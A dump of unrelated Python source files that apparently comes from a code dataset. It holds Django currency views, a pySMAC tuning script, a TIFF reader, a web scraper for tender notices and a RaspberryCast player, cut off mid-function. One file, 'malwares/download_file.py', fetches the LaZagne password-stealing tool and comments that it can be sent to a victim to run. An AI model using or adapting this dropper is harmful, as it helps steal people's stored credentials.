Valuta.objects.filter(Cur_ID=145)[0]\n Valuta_kurs.objects.bulk_create([Valuta_kurs(Cur_ID=kurs_USD,\n Cur_OfficialRate=2.1123,\n Date=now.isoformat())])\n return HttpResponse(kurs_USD)\n\n\ndef rate_select(request):\n kurs_USD2 = Valuta_kurs.objects.filter(Cur_ID=145)\n return HttpResponse(kurs_USD2)\n\n\ndef rate_delete(request):\n kurs_USD3 = Valuta_kurs.objects.filter(Cur_ID=145,\n Cur_OfficialRate=2.1123).delete()\n return HttpResponse(kurs_USD3)\n\n\ndef rate_update(request):\n kurs_USD4 = Valuta_kurs.objects.filter(Cur_ID=145,\n Cur_OfficialRate=2.1123).update(\n Cur_OfficialRate=1.9999)\n return HttpResponse(kurs_USD4)\n\n\ndef rate_by_week(request, Cur_ID):\n if request.user.is_authenticated and request.user.is_staff:\n username = request.user\n # кэширование\n # client = Client(('localhost', 11211))\n # table_rates = client.get('table_rates')\n # if table_rates is None:\n url = 'http://www.nbrb.by/API/ExRates/Rates/Dynamics/' + str(Cur_ID) + '?startDate=' + str(\n week_ago) + '&endDate=' + str(\n today)\n response = requests.get(url).json()\n # чтобы df.to_html не обрезал длинные строки до 50 символов\n pd.set_option('display.max_colwidth', -1)\n df = pd.DataFrame(response)\n str_3 = df[\"Cur_OfficialRate\"].mean()\n df = df.append({'Cur_ID': '---', 'Cur_OfficialRate': str_3, 'Date': '---'}, ignore_index=True)\n\n table_rates = df.to_html(escape=False, index=False, classes='table table-striped')\n # кэширование\n # client.set('table_rates', pickle.dumps(table_rates), expire=60)\n # else:\n # table_rates = pickle.loads(table_rates)\n\n else:\n username = 'Аноним'\n table_rates = 'Вы не зарегистрированы или не имеете прав'\n\n return render_to_response('my_exrate/rate_by_week.html',\n {'table': table_rates,\n 'user': username, 'login_form': request.user.is_authenticated})\n\n\ndef rate_by_day(request):\n if request.user.is_authenticated:\n username = request.user\n url = 'http://www.nbrb.by/API/ExRates/Rates?Periodicity=0'\n try:\n spisok_kursov = requests.get(url).json()\n # чтобы df.to_html не обрезал длинные строки до 50 символов\n pd.set_option('display.max_colwidth', -1)\n df = pd.DataFrame(spisok_kursov)\n # df.to_csv('file_rates.csv', encoding='utf-8', index=False, index_label=True)\n df1 = pd.DataFrame(columns=['amchart'])\n df2 = pd.DataFrame(columns=['matplotlib'])\n df3 = pd.DataFrame(columns=['plotly'])\n for row_k in spisok_kursov:\n str_1 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df1 = df1.append({'amchart': str_1}, ignore_index=True)\n str_2 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df2 = df2.append({'matplotlib': str_2}, ignore_index=True)\n str_3 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df3 = df3.append({'plotly': str_3}, ignore_index=True)\n if Valuta.objects.filter(Cur_ID=row_k['Cur_ID']).exists() == False:\n kurs = Valuta(Cur_ID=row_k['Cur_ID'],\n Cur_Abbreviation=row_k['Cur_Abbreviation'],\n Cur_Scale=row_k['Cur_Scale'],\n Cur_Name=row_k['Cur_Name'])\n kurs.save()\n if Valuta_kurs.objects.filter(Cur_ID_id=row_k['Cur_ID'],\n Date=row_k['Date']).exists() == False:\n val = Valuta_kurs(Cur_ID_id=row_k['Cur_ID'], Date=row_k['Date'],\n Cur_OfficialRate=row_k['Cur_OfficialRate'])\n val.save()\n df['amchart'] = df1\n df['matplotlib'] = df2\n df['plotly'] = df3\n if request.LANGUAGE_CODE == 'ru':\n table_rates = df.to_html(escape=False, index=False, classes=\"table table-striped\",\n columns=['Cur_ID', 'Cur_Abbreviation', 'Cur_Name', 'Cur_OfficialRate',\n 'Cur_Scale',\n 'amchart', 'matplotlib', 'plotly'])\n else:\n table_rates = df.to_html(escape=False, index=False, classes=\"table table-striped\",\n columns=['Cur_ID', 'Cur_Abbreviation', 'Cur_OfficialRate',\n 'Cur_Scale',\n 'amchart', 'matplotlib', 'plotly'])\n except:\n table_rates = '
Cur_ID Cur_Abbreviation Cur_Name Cur_OfficialRate Cur_Scale amchart matplotlib
'\n else:\n username = 'Аноним'\n table_rates = 'Вы не зарегистрированы или не имеете прав'\n\n return render_to_response('my_exrate/rate_by_day.html',\n {'table': table_rates,\n 'user': username, 'login_form': request.user.is_authenticated})\n\n\ndef questions(request):\n latest_question_list = Question.objects.order_by('id')[:5]\n context = {'latest_question_list': latest_question_list}\n return render(request, 'my_exrate/index.html', context)\n\n\ndef results(request, question_id):\n response = \"You're looking at the results of question %s.\"\n return HttpResponse(response % question_id)\n\n\ndef vote(request, question_id):\n return HttpResponse(\"You're voting on question %s.\" % question_id)\n\n\ndef detail(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'my_exrate/detail.html', {'question': question})\n\n\ndef test_fn1(ls, divisor):\n result = []\n idx = 0\n while idx < len(ls):\n result.append(ls[idx] / divisor)\n idx = idx + 1\n return result\n\n\ndef lang_change(request, lang_code):\n translation.activate(lang_code)\n request.session[LANGUAGE_SESSION_KEY] = lang_code\n my_string = _(\"Главная\")\n print(my_string)\n # return render(request, 'my_exrate/index.html')\n return HttpResponseRedirect('/')\n\n\ndef server_upd(request):\n if request.POST.get('Cur_ID') is None or request.POST.get('Date') is None or request.POST.get(\n 'Cur_OfficialRate') is None:\n status_upd = 'No input data'\n else:\n kurs_upd = Valuta_kurs.objects.filter(Cur_ID=request.POST.get('Cur_ID'),\n Date=request.POST.get('Date')).update(\n Cur_OfficialRate=request.POST.get('Cur_OfficialRate'))\n status_upd = 'OK'\n print(str(kurs_upd))\n print(status_upd)\n\n return JsonResponse({'status': status_upd})\n","sub_path":"my_exrate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"33779407","text":"\n# coding: utf-8\n\n# In[6]:\n\nfrom __future__ import division\nimport pysmac\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.metrics import roc_curve, roc_auc_score\nimport matplotlib.pyplot as plt\n\n\n# In[7]:\n\n#reading data files\nx_train = pd.read_csv('../input/data100/train.csv', header=None, dtype=np.float32)\ny_train=pd.read_csv('../input/data100/y_train.csv', header=None, dtype=np.int32).values.ravel()\nx_valid=pd.read_csv('../input/data100/valid.csv', header=None, dtype=np.float32)\ny_valid=pd.read_csv('../input/data100/y_valid.csv', header=None, dtype=np.int32).values.ravel()\n\n\n# In[8]:\n\ndef choose_classifier(classifier, # which classifier to use\n trees_n_estimators = None, trees_criterion = None, \n trees_max_features = None, trees_max_depth = None,\n trees_min_samples_split = None\n ):\n\n if classifier == 'random_forest':\n predictor = RandomForestClassifier(trees_n_estimators,\n trees_criterion,\n trees_max_depth,\n trees_min_samples_split,\n trees_max_features,\n )\n elif classifier == 'extra_trees':\n predictor = ExtraTreesClassifier(trees_n_estimators,\n trees_criterion,\n trees_max_depth,\n trees_min_samples_split,\n trees_max_features,\n )\n \n predictor.fit(x_train, y_train)\n y_predictions = predictor.predict(x_test)\n \n return 1-roc_auc_score(y_test, y_predictions)\n\n\n# In[ ]:\n\n# defining all the parameters with respective defaults.\nparameter_definition=dict( trees_n_estimators=('integer', [10,150], 75),\n trees_criterion =('categorical', ['gini', 'entropy'], 'entropy'),\n trees_max_features=('real', [0.0,1.0], 0.1),\n trees_max_depth = ('integer', [5,40], 10),\n trees_min_samples_split = ('integer', [1,10], 2),\n classifier = ('categorical', ['random_forest','extra_trees'], 'random_forest'),\n )\n\n\n# In[ ]:\n\n# creation of the SMAC_optimizer object.\nopt = pysmac.SMAC_optimizer( debug = 0,\n working_directory = '/tmp/pySMAC_test/', persistent_files=True, )\n\n\n# Using the minimize method\nvalue, parameters = opt.minimize(choose_classifier,\n max_evaluations=50,\n parameter_dict=parameter_definition)\n\nprint('The highest accuracy found: %f'%(value))\nprint('Parameter setting %s'%parameters)\n","sub_path":"homesite/pySMAC_RF_ET.py","file_name":"pySMAC_RF_ET.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"88589174","text":"from ScanImageTiffReader import ScanImageTiffReader\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport json\n\nch_num = {\n 'green': 0,\n 'red': 1,\n 'blue': 2\n}\n\n# #hate this\n# class Channel(Image):\n#\n# def __init__(self, color):\n# self.color = color\n# super().__init__()\n#\n# def get_channel_means(self):\n# # calculate many frames are in a volume\n# n_channels = 2 # meta['SI.hChannels.channelsAvailable']\n# n_planes = 6 # meta['SI.hFastZ.numFramesPerVolume']\n# frames_per_vol = n_planes * n_channels\n# self.ch_mean = np.nanmean(self.tiff[ch_num[self.color]:len(self.tiff):frames_per_vol,:,:],axis=0)\n#\n# def adjust_lookup(self, min, max):\n# self.ch_mean[self.ch_mean < min] = min\n# self.ch_mean[self.ch_mean > max] = max\n\n\n# WORKING ON THIS TO GET META-DATA PULLED AND STORED\n# ALSO HAVE PICKLE FILE SAVED\ndef read_meta(file):\n with ScanImageTiffReader(file) as reader:\n meta = reader.metadata()\n print('metadata retrieved!')\n\n metdata = {\n 'planes': len(metadata.split('hFastZ.userZs = [')[1].split(']')[0].split(' ')),\n 'nchannels': len(metadata.split('channelSave = [')[1].split(']')[0].split(';')),\n 'f_rate': float(metadata.split('scanVolumeRate = ')[1].split(r'\\n')[0])\n }\n\n return metadata\n\ndef read_tiff(file):\n reader = ScanImageTiffReader(file)\n raw_tiff = reader.data()\n print('.tiff read in succesffully!')\n return raw_tiff\n\ndef adjust_lookup(ch_mean, min, max):\n ch_mean[ch_mean < min] = min\n ch_mean[ch_mean > max] = max\n return ch_mean\n\nclass Image:\n \"\"\"Init with red and green channels available.\"\"\"\n\n def __init__(self, file, wavelenth, channels):\n self.wavelenth = wavelenth\n self.file = file\n self.channels = channels\n\n def read_ave_tiff(self,file):\n\n # read in tiff\n raw_tiff = read_tiff(file)\n\n # calculate many frames are in a volume\n n_channels = 2 # meta['SI.hChannels.channelsAvailable']\n n_planes = 6 # meta['SI.hFastZ.numFramesPerVolume']\n frames_per_vol = n_planes * n_channels\n\n # calculate mean per channel\n for ch in raw_tiff:\n self.mean_tiff = np.nanmean(self.raw_tiff[ch:len(self.raw_tiff[ch]):frames_per_vol,:,:],axis=0)\n\n ### and then make rgb (????)\n ### nah cause I want to do adjust lookup on it\n\n def make_rgb(self):\n\n\n # make an empty numpy array for the image\n rgb_im = np.zeros((512,512,3))\n\n # loop over mean_tiff's channels, adjust the lookups, and\n for i,ch in enumerate(self.mean_tiff):\n adjust_lookup(self.mean_tiff[i], min, max)\n self.mean_tiff -= self.mean_tiff.min()\n rgb_im[:,:,i] = self.mean_tiff/self.mean_tiff.max()\n\n plt.imshow(rgb_im)\n\n\n # self.green_ch_mean = np.nanmean(self.raw_tiff[0:len(self.raw_tiff[0]):frames_per_vol,:,:],axis=0)\n # self.red_ch_mean = np.nanmean(self.raw_tiff[1:len(self.raw_tiff[1]):frames_per_vol,:,:],axis=0)\n\n # return a list that contains the average tiff channels\n # self.mean_image = [self.green_ch_mean,self.red_ch_mean]\n\n\n # def mean_image(self, colors):\n # ch1 = Channel(colors[0])\n # ch2 = Channel(colors[1])\n # self.mean_image = [ch1.get_channel_means(), ch2.get_channel_means()]\n #\n\n\n\n\nfrom tiffs import *\nimport glob\ng = glob.glob('/Users/willh/Google Drive/Code/*')\n# assign it to file and do try my tiff stuff\nfile = g[1]\n\n#files = []\n#for file,i in enumerate(g):\n# files[i] = file\n\nwavelength = '920'\nchannels = ['green', 'red']\nimage = Image(file,wavelength,channels)\nimage.read_tiff()\nprint(ch1.color)\nimage.mean_image(channels)\n","sub_path":"python/tiffs.py","file_name":"tiffs.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"506073667","text":"#!/usr/bin/env python\nimport requests #lbrary that allows to send requests to internet.\n\ndef download(url):\n get_response=requests.get(url) #creating instance of an object get_response for the requests objectand calling function get.\n #print(get_response) #will display only the response(200,300,301 etc).\n #print(get_response.content) #content will desplay the actual binary output.\n get_name= url.split(\"/\")[-1] #split is a function to split a content and store each content as a list.\n # Here we split it based on the \"/\".\n # [-1] is used to select the last item in the list. which is the name of the file.\n with open(get_name,\"wb\",) as outputfile: #with used to deal with un managed objects. opening a file in write mode with binary content.\n #any name can be given to the file. we use the split to automate the task and\n # thus, assigning appropriate file type. the file will be stored in the directory in which the program is being executed.\n # outputfile is the reference object that can be used in the program.\n outputfile.write(get_response.content) #write function writes the argument passed to, on to the file.\n\ndownload(\"https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip\") #any file to be downloaded can be given as the url.\n\n#LaZagne is a malware file that sniffs all the passwords stored in the computer system\n#Lazagne is available for all operating systems. Here i have used the windows version.\n\n#comment:\n#This code can be sent to the victim and when he executes this the file wil be downloaded automatically.\n","sub_path":"malwares/download_file.py","file_name":"download_file.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"468242564","text":"#!/usr/bin/env python\n\nimport sys\n\nif __name__ == '__main__':\n n=0\n for line in sys.stdin:\n\n col1,letra,fecha,valor1 = line.split(\"\\t\")\n col2=int(valor1)\n if n < 6: \n sys.stdout.write(\"{} {} {}\\n\".format(letra,fecha,col2))\n n=n+1\n","sub_path":"01-hadoop-50/q09-10/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307717386","text":"import requests\nfrom bs4 import BeautifulSoup\nimport random\nimport pandas as pd\nimport re\nimport time\n\n# 头文字,模仿浏览器,以防屏蔽IP\nheaders_one = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"\n \" AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\"\n}\nheaders_two = {\n 'user-agent': \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\"\n}\nheaders_three = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'\n}\nheaders_list = [headers_one, headers_two, headers_three]\n\n# 定义 第一个页面的数据 的变量\nname_list = [] # 项目名称\nlink_list = [] # 项目连链接\ndate_p_list = [] # 项目刊登日期\n\n# t(tender)代表招标 、 w(winning bid)代表中标\nw_f_name_bidder_list = [] # 第一中标候选人\nw_s_name_bidder_list = [] # 第二中标候选人\nw_t_name_bidder_list = [] # 第三中标候选人\nw_price_list = [] # 中标价\nt_name_list = [] # 项目招标人\nt_num_list = [] # 项目招标编号\nt_depa_list = [] # 招标代理机构\nBRN_list = [] # 工商注册号\nproposed_bidder = [] # 拟中标人\naccept_com_depa_list = [] # 投诉受理部门\nw_s_price_list = [] # 第二中标人价格\nw_t_price_list = [] # 第三中标人价格\n\nlist_c_dict = {\n 1: w_f_name_bidder_list, 2: w_s_name_bidder_list, 3: w_t_name_bidder_list,\n 4: w_price_list, 5: t_name_list, 6: t_num_list, 7: t_depa_list, 8: BRN_list, 9: proposed_bidder,\n 10: accept_com_depa_list, 11: w_s_price_list, 12: w_t_price_list\n}\n\n\ndef parse_outer_page():\n domain = \"https://www.cqggzy.com\"\n start_url = (\"http://www.cqggzy.com/web/services/PortalsWebservice/getInfoList?response=application/\"\n \"json&pageIndex=15583&pageSize=1\" # 爬的两天,网站上传了两次新数据,在这里修改。\n \"&siteguid=d7878853-1c74-4913-ab15-1d72b70ff5e7&categorynum=005002001&title=\"\n \"&infoC=&_=1548761616465\")\n response = requests.get(start_url, headers=headers_list[random.randint(0, 2)], verify=False)\n\n # 将返回的JSON数据 转换为 列表\n response_items_list = eval(response.json().get(\"return\"))\n\n # 获取 项目名称、项目链接、项目刊登日期 数据\n for item in response_items_list:\n name_list.append(item.get(\"title\"))\n link_list.append(domain + item.get(\"infourl\"))\n date_p_list.append(item.get(\"infodate\"))\n\n\ndef parse_inner_page():\n count = 0\n for item in link_list:\n\n # 在控制台显示次数\n count = count + 1\n w_f_price_tmp = []\n w_s_price_tmp = []\n w_t_price_tmp = []\n accept_com_depa_tmp = []\n proposed_bidder_tmp = []\n BRN_tmp = []\n t_num_tmp = []\n t_name_tmp = []\n w_price_tmp = []\n w_f_name_bidder_tmp = []\n w_s_name_bidder_tmp = []\n w_t_name_bidder_tmp = []\n t_depa_tmp = []\n\n list_c_dict_tmp = {\n 1: w_f_name_bidder_tmp, 2: w_s_name_bidder_tmp, 3: w_t_name_bidder_tmp,\n 4: w_price_tmp, 5: t_name_tmp, 6: t_num_tmp, 7: t_depa_tmp, 8: BRN_tmp, 9: proposed_bidder_tmp,\n 10: accept_com_depa_tmp, 11: w_s_price_tmp, 12: w_t_price_tmp, 13: w_f_price_tmp\n }\n response = requests.get(item, headers=headers_list[random.randint(0, 2)])\n print(response)\n print(count)\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n s = BeautifulSoup(response.text, \"html5lib\")\n\n if len(s.find_all(name=\"tbody\")) != 0:\n trs = s.find_all(name=\"tbody\")[0].find_all(\"tr\")\n list_c_dict_tmp = crawl_data(trs)\n\n # 整合\n for nc in range(1, 13):\n list_c_dict[nc].append(list_c_dict_tmp[nc])\n\n # 测试\n # for i in range(1, 13):\n # print(len(list_c_dict[i]))\n\n\ndef crawl_data(trs):\n # 初始化数据\n w_f_price_tmp = []\n w_s_price_tmp = []\n w_t_price_tmp = []\n accept_com_depa_tmp = []\n proposed_bidder_tmp = []\n BRN_tmp = []\n t_num_tmp = []\n t_name_tmp = []\n w_price_tmp = []\n w_f_name_bidder_tmp = []\n w_s_name_bidder_tmp = []\n w_t_name_bidder_tmp = []\n t_depa_tmp = []\n\n list_c_dict_tmp = {\n 1: w_f_name_bidder_tmp, 2: w_s_name_bidder_tmp, 3: w_t_name_bidder_tmp,\n 4: w_price_tmp, 5: t_name_tmp, 6: t_num_tmp, 7: t_depa_tmp, 8: BRN_tmp, 9: proposed_bidder_tmp,\n 10: accept_com_depa_tmp, 11: w_s_price_tmp, 12: w_t_price_tmp, 13: w_s_price_tmp\n }\n for tr in trs:\n ps = tr.find_all(\"p\")\n if not ps:\n tds = tr.find_all(\"td\")\n count = -1\n for td in tds:\n count = count + 1\n print(td.get_text())\n tmp = re.sub(r\"\\s+[::\\\"“”\\']\", \"\", td.get_text())\n # 属性class=B的标签里找第一、二、三中标候选人及价格\n td_tmp = td.find_all(attrs={\"class\": \"B\"})\n print(tmp)\n if tmp != '':\n if tmp == \"工程编码\":\n t_num_tmp.append(tds[1].get_text())\n elif tmp == \"标段编号\":\n t_num_tmp.append(tds[1].get_text())\n elif tmp == \"填报人\": # 理解为招标人\n t_name_tmp.append(tds[1].get_text())\n elif tmp == \"项目法人\":\n t_name_tmp.append(tds[1].get_text())\n elif tmp == \"填报单位\": # 理解为招标代理机构\n t_depa_tmp.append(tds[1].get_text())\n elif tmp == \"招标代理机构\":\n t_depa_tmp.append(tds[1].get_text())\n elif len(td_tmp) > 15:\n for i in range(0, len(td_tmp)):\n # 第一中标候选人及价格\n if td_tmp[i].get_text() == \"1\":\n w_f_name_bidder_tmp.append(td_tmp[i + 1].get_text())\n w_price_tmp.append(td_tmp[i + 2].get_text())\n # 第二中标候选人及价格\n if td_tmp[i].get_text() == \"2\":\n w_s_name_bidder_tmp.append(td_tmp[i + 1].get_text())\n w_s_price_tmp.append(td_tmp[i + 2].get_text())\n # 第三中标候选人及价格\n if td_tmp[i].get_text() == \"3\":\n w_t_name_bidder_tmp.append(td_tmp[i + 1].get_text())\n w_t_price_tmp.append(td_tmp[i + 2].get_text())\n\n elif td.get_text() == \"第一中标(选)候选人\":\n w_f_name_bidder_tmp.append(tds[count + 1].get_text())\n elif td.get_text() == \"第二中标(选)候选人\":\n w_s_name_bidder_tmp.append(tds[count + 1].get_text())\n elif td.get_text() == \"第三中标(选)候选人\":\n w_t_name_bidder_tmp.append(tds[count + 1].get_text())\n elif td.get_text() == \"中标(选)人\":\n proposed_bidder_tmp.append(tds[count + 1].get_text())\n elif td.get_text() == \"中标(选)价(万元)\":\n w_price_tmp.append(tds[count + 1].get_text())\n\n else:\n # 记录有多少个item(进行了多少次循环)用于最后判断 本页面 抓取数据 是否完成\n # count = count + 1\n # 抓取数据\n if ps and (len(ps) > 1):\n tmp = re.sub(r\"\\s+\", \"\", ps[0].get_text().strip())\n\n # print(ps)\n # print(len(ps))\n # print(tmp)\n\n # 招标编码、招标人(填报人)、招标代理机构\n if tmp == \"招标公告编号\":\n t_num_tmp.append(ps[1].get_text().strip())\n elif tmp == \"招标编码\":\n t_num_tmp.append(ps[1].get_text().strip())\n elif tmp == \"招标人\":\n if ps[1].get_text() == \"单位名称\":\n t_name_tmp.append(ps[2].get_text().strip())\n else:\n t_name_tmp.append(ps[1].get_text().strip())\n elif tmp == \"填报人\":\n t_name_tmp.append(ps[1].get_text().strip())\n elif tmp == \"招标代理机构\":\n t_depa_tmp.append(ps[1].get_text().strip())\n\n # 第二中标人 及 价格\n elif tmp == \"第二中标候选人\":\n w_s_name_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_s_price_tmp.append(spider_price(ps))\n elif tmp == \"第二中标(选)候选人\":\n w_s_name_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_s_price_tmp.append(spider_price(ps))\n\n # 第三中标人 及 价格\n elif tmp == \"第三中标候选人\":\n w_t_name_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_t_price_tmp.append(spider_price(ps))\n elif tmp == \"第三中标(选)候选人\":\n w_t_name_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_t_price_tmp.append(spider_price(ps))\n\n # 中标人、拟中标人、中标(选)人\n elif tmp == \"中标人\":\n proposed_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_price_tmp.append(spider_price(ps))\n # print()\n elif tmp == \"中标(选)人\":\n proposed_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_price_tmp.append(spider_price(ps))\n elif tmp == \"拟中标人\":\n proposed_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n # print(2)\n w_price_tmp.append(spider_price(ps))\n\n # 中标人、拟中标人、中标(选)人 的 中标金额\n elif tmp == \"中标金额(万元)\":\n w_price_tmp.append(ps[1].get_text().strip())\n elif tmp == \"中标金额(元)\":\n w_price_tmp.append(ps[1].get_text().strip())\n elif tmp == \"中标(选)价(元)\":\n w_price_tmp.append(ps[1].get_text().strip())\n elif tmp == \"中标价\":\n w_price_tmp.append(ps[1].get_text().strip())\n\n # 工商注册号、投诉受理部门\n elif tmp == \"工商注册号\":\n BRN_tmp.append(ps[1].get_text().strip())\n # print(ps[1].get_text())\n elif tmp == \"投诉受理部门\":\n accept_com_depa_tmp.append(ps[1].get_text().strip())\n\n # 第一中标候选人 及 价格\n elif len(ps) > 4:\n for i in range(0, len(ps)):\n if ps[i].get_text() == \"第一中标候选人\":\n if i + 2 <= len(ps):\n w_f_name_bidder_tmp.append(ps[i + 1].get_text().strip())\n # print(len(ps))\n # print(i)\n if i + 4 <= len(ps):\n w_f_price_tmp.append(ps[i + 3].get_text().strip())\n # print(ps[i + 3].get_text())\n elif len(ps) > 4:\n for i in range(0, len(ps)):\n if ps[i].get_text() == \"第一中标(选)候选人\":\n w_f_name_bidder_tmp.append(ps[i + 1].get_text().strip())\n if i + 4 <= len(ps):\n w_f_price_tmp.append(ps[i + 2].get_text().strip())\n return list_c_dict_tmp\n\n\ndef spider_price(ps):\n \"\"\"\n There is code duplication when crawling prices\n Param ps\n Return: price\n \"\"\"\n # 去除所有空格\n ps_tmp = re.sub(r\"\\s+\", \"\", ps[2].get_text().strip())\n ps_tmp_t = re.sub(r\"\\s+\", \"\", ps[3].get_text().strip())\n # print(ps_tmp)\n # print(ps_tmp_t)\n # 关于括号的全角 和 半角 的不同情况 应该有更好的解决办法吧!!\n if ps_tmp == \"中标金额(万元)\":\n return ps[3].get_text()\n elif ps_tmp == \"中标金额(万元)\":\n return ps[3].get_text()\n elif ps_tmp == \"中标金额\":\n if ps[3].get_text() == \"(元)\":\n return ps[4].get_text()\n elif ps_tmp == \"中标金额(元)\":\n return ps[3].get_text()\n elif ps_tmp == \"中标金额(元)\":\n return ps[3].get_text()\n elif ps_tmp == \"中标(选)价(元)\":\n return ps[3].get_text()\n\n elif ps_tmp_t == \"中标金额(万元)\":\n return ps[4].get_text()\n if ps_tmp == \"中标金额(万元)\":\n return ps[3].get_text()\n elif ps_tmp_t == \"中标金额(元)\":\n return ps[4].get_text()\n elif ps_tmp == \"中标金额(元)\":\n return ps[4].get_text()\n elif ps_tmp_t == \"中标(选)价(元)\":\n return ps[4].get_text()\n elif ps_tmp_t == \"中标金额\":\n return ps[4].get_text()\n\n\nif __name__ == \"__main__\":\n parse_outer_page()\n data_outer_dict = {\n '项目名称': name_list, '项目链接': link_list, '刊登日期': date_p_list\n }\n\n parse_inner_page()\n data_inner_dict = {\n '项目名称': name_list, '项目链接': link_list, '刊登日期': date_p_list, '项目招标人': t_name_list,\n '项目招标编号': t_num_list, '项目代理机构': t_depa_list, '工商注册号': BRN_list, '拟中标人': proposed_bidder,\n '中标价(费率)': w_price_list, '第二中标候选人': w_s_name_bidder_list, '第二中标价格': w_s_price_list,\n '第三中标候选人': w_t_name_bidder_list, '第三中标价格': w_t_price_list, '第一中标人': w_f_name_bidder_list\n }\n\n print(data_inner_dict)\n pd.DataFrame(data_outer_dict).to_csv(r'C:\\Users\\13754\\Desktop\\SpidersDemo(1).csv')\n pd.DataFrame(data_inner_dict).to_csv(r'C:\\Users\\13754\\Desktop\\SpidersDemo(3).csv')\n","sub_path":"Demo.py","file_name":"Demo.py","file_ext":"py","file_size_in_byte":14684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"627588310","text":"import os\nimport sys\nimport time\nimport json\nimport socket\nimport base64\nimport pygame\nimport signal\nimport logging\nimport threading\nimport youtube_dl\n\nfrom PIL import Image\nfrom omxplayer.player import OMXPlayer\n\nlogger = logging.getLogger(\"RaspberryCast\")\nvolume = 0\nplayer = None\n\nDIR_PATH = os.path.dirname(os.path.abspath(__file__))\n\n# Volume\ntry:\n with open(os.path.join(DIR_PATH, \"volume\"), \"r\") as f:\n volume = int(f.read())\nexcept Exception as e:\n volume = 0\n\n# SIGTERM handler\ndef terminationhandler(signum, frame):\n sys.exit(0)\n\nsignal.signal(signal.SIGTERM, terminationhandler)\n\n# Pygame Initialization\npygame.display.init()\npygame.font.init()\npygame.mouse.set_visible(0)\nscreen = pygame.display.set_mode((0,0), pygame.FULLSCREEN)\n\ndef aspectscale(img, size):\n ix,iy = img.get_size()\n bx, by = size\n\n if ix > iy:\n # fit to width\n scale_factor = bx/float(ix)\n sy = scale_factor * iy\n if sy > by:\n scale_factor = by/float(iy)\n sx = scale_factor * ix\n sy = by\n else:\n sx = bx\n else:\n # fit to height\n scale_factor = by/float(iy)\n sx = scale_factor * ix\n if sx > bx:\n scale_factor = bx/float(ix)\n sx = bx\n sy = scale_factor * iy\n else:\n sy = by\n\n return pygame.transform.scale(img, (int(sx), int(sy)))\n\n\ndef displaysurface(surface, show_ip):\n x_centered = screen.get_size()[0] / 2 - surface.get_size()[0] / 2\n y_centered = screen.get_size()[1] / 2 - surface.get_size()[1] / 2\n\n screen.blit(surface, (x_centered, y_centered))\n\n if show_ip:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n ip_address = s.getsockname()[0]\n s.close()\n font = pygame.font.SysFont('Arial', screen.get_size()[0] // 24)\n text = font.render(ip_address, True, (128, 128, 128))\n screen.blit(text, (screen.get_size()[0] // 12, screen.get_size()[1] * 7 // 8))\n\n pygame.display.update()\n\n\ndef displayimage(imagefilename):\n surface = pygame.Surface(screen.get_size()).convert_alpha()\n pil_img = Image.open(imagefilename).convert('RGB')\n mode = pil_img.mode\n size = pil_img.size\n data = pil_img.tobytes()\n img = aspectscale(pygame.image.fromstring(data, size, mode), (screen.get_size()))\n x_centered = screen.get_size()[0] / 2 - img.get_size()[0] / 2\n y_centered = screen.get_size()[1] / 2 - img.get_size()[1] / 2\n surface.blit(img, (x_centered, y_centered))\n displaysurface(surface, False)\n\n\nready_surf = pygame.Surface(screen.get_size())\nready_img = aspectscale(pygame.image.load(os.path.join(DIR_PATH, \"images\", \"ready.jpg\")), (screen.get_size()))\nready_img_x_centered = screen.get_size()[0] / 2 - ready_img.get_size()[0] / 2\nready_img_y_centered = screen.get_size()[1] / 2 - ready_img.get_size()[1] / 2\nready_surf.blit(ready_img, (ready_img_x_centered, ready_img_y_centered))\n\nprocessing_surf = pygame.Surface(screen.get_size())\nprocessing_img = aspectscale(pygame.image.load(os.path.join(DIR_PATH, \"images\", \"processing.jpg\")), (screen.get_size()))\nprocessing_img_x_centered = screen.get_size()[0] / 2 - processing_img.get_size()[0] / 2\nprocessing_img_y_centered = screen.get_size()[1] / 2 - processing_img.get_size()[1] / 2\nprocessing_surf.blit(processing_img, (processing_img_x_centered, processing_img_y_centered))\n\ndisplaysurface(ready_surf, True)\n\ndef playeraction(action):\n global player\n try:\n player.action(action)\n except Exception as e:\n print(e)\n except:\n raise\n\n\ndef launchhome():\n global player\n try:\n player.quit() 